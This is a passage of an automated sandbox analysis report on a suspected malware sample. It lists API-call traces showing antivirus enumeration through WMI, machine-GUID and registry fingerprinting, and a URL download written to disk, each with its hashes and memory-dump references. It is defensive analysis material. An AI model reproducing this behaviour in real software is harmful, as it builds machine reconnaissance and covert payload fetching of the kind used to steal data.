                                                                                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
                                                                                                                                                                                                                                        • CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00411342
                                                                                                                                                                                                                                          • Part of subcall function 00411670: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0041136B,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000), ref: 00411678
                                                                                                                                                                                                                                          • Part of subcall function 00411670: CharToOemW.USER32(?,00000000), ref: 00411685
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041137D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                        • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                        • API String ID: 685420537-2776955613
                                                                                                                                                                                                                                        • Opcode ID: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
                                                                                                                                                                                                                                        • Instruction ID: 40a9cb50dccdf73a38e95a76c9e526bc5b1cbb250bb0618e8cd6fd3f3244c3ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C417F71B01629ABCB20DB85DC49FEFBB78EF49B50F10421AF515A7290C7789941CBE4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,01456570,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF
                                                                                                                                                                                                                                        • RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00410947
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,01461DB8,00000000,000F003F,?,00000400), ref: 00410995
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 004109AA
                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,01461DD0,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                                                                        • String ID: - $%s\%s$?
                                                                                                                                                                                                                                        • API String ID: 1989970852-3278919252
                                                                                                                                                                                                                                        • Opcode ID: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
                                                                                                                                                                                                                                        • Instruction ID: 46b3b7c26f9db54fd8d8a07889e13f83e758814ada42e2adbf2fffcbf2ed9ca1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 158148B190021DABCB14DBA5DC94AEEBBB8BF59704F10816EF505B3241DB785A48CBB4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
                                                                                                                                                                                                                                        • GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00410E54
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00410E91
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00000000,00428098), ref: 00410EA0
                                                                                                                                                                                                                                          • Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00410EC2
                                                                                                                                                                                                                                          • Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
                                                                                                                                                                                                                                          • Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00410EF0
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                        • String ID: :\$C
                                                                                                                                                                                                                                        • API String ID: 2389002695-3309953409
                                                                                                                                                                                                                                        • Opcode ID: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
                                                                                                                                                                                                                                        • Instruction ID: cd9e33ec6b3912d753ff03e78be9aa97267fc370a97b6a7823d5d9fd7b56550d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C41F571900219ABDB10EBE4DC15BEEBBB9EF18704F10015EFA05B3281DB785A44C7E9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456
                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,0000000D), ref: 004058ED
                                                                                                                                                                                                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004059BB
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004059C2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 105467990-0
                                                                                                                                                                                                                                        • Opcode ID: b105dae5c726c87f236add07edf50401fe4d652777b786edf905304db798c208
                                                                                                                                                                                                                                        • Instruction ID: 13221a786792afbe71e2db2b5b3dd3a866a49aaf32af835bc09817eda76de5d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b105dae5c726c87f236add07edf50401fe4d652777b786edf905304db798c208
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C518F75500249EBDB10DBA0CC46FEE77B8EB05704F60416AFA01E72C1DB786A48CBA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00404412
                                                                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
                                                                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
                                                                                                                                                                                                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                        • String ID: <$zZ@$zZ@
                                                                                                                                                                                                                                        • API String ID: 1274457161-2926614232
                                                                                                                                                                                                                                        • Opcode ID: de321b7af41221ec208d27f0568573924e6c00b46f5a2e4a9ebbe931de8dac36
                                                                                                                                                                                                                                        • Instruction ID: 5ec785183fc32c623f1de6a7566c658e8ea65be6cb1651013de8fb2e27aaef0e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de321b7af41221ec208d27f0568573924e6c00b46f5a2e4a9ebbe931de8dac36
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C2160B5900208EBDB00DFA4D885BDD7BB8FF05724F14022AFA25A72C1DB395A45CB94
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,0145F6D0,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040EBB0
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,0145F710,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040EC3A
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,0145F720,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040ED6A
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,0145F6D0), ref: 0040EE24
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,0145F710), ref: 0040EEB0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                                                                                                        • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                        • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                        • Opcode ID: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
                                                                                                                                                                                                                                        • Instruction ID: d8ce4b8c1e13b8f110d5154c309a70af36248a3d2e26b75c81aeb3fa987dec21
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4E1CA70900248DBCB14EFA9C946BDDBBB5AF59304F10C16EF945A7382DB785608C7E6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00418970: LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(00000000,0144F198), ref: 00418990
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F228), ref: 004189BD
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F240), ref: 004189D6
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F450), ref: 004189EE
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F498), ref: 00418A06
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,01453258), ref: 00418A1F
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,014529C0), ref: 00418A37
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,01452AA0), ref: 00418A4F
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F4B0), ref: 00418A68
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F4C8), ref: 00418A80
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F4E0), ref: 00418A98
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F4F8), ref: 00418AB1
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,01452BC0), ref: 00418AC9
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F468), ref: 00418AE1
                                                                                                                                                                                                                                          • Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F510), ref: 00418AFA
                                                                                                                                                                                                                                          • Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                          • Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                          • Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                          • Part of subcall function 00401090: CreateDCA.GDI32(014532F8,00000000,00000000,00000000), ref: 0040109D
                                                                                                                                                                                                                                          • Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
                                                                                                                                                                                                                                          • Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 0041028C
                                                                                                                                                                                                                                          • Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 00410293
                                                                                                                                                                                                                                          • Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,014532E8), ref: 004102A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014532E8,?,00428884,?,00000000,004283B2), ref: 004188F6
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00418901
                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001B58), ref: 0041890C
                                                                                                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418922
                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041893C
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041894A
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00418952
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3108587868-0
                                                                                                                                                                                                                                        • Opcode ID: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
                                                                                                                                                                                                                                        • Instruction ID: 647acd411ead89d836921b015eed4027088bc395b0a35a31edabbaa9f7aa6c77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA217F309001096AD700F7F1DC56FEE7369AF05709F50012EF606B60D2DF7C2989866D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00410CB5
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
                                                                                                                                                                                                                                        • CharToOemA.USER32(00000000,?), ref: 00410D12
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
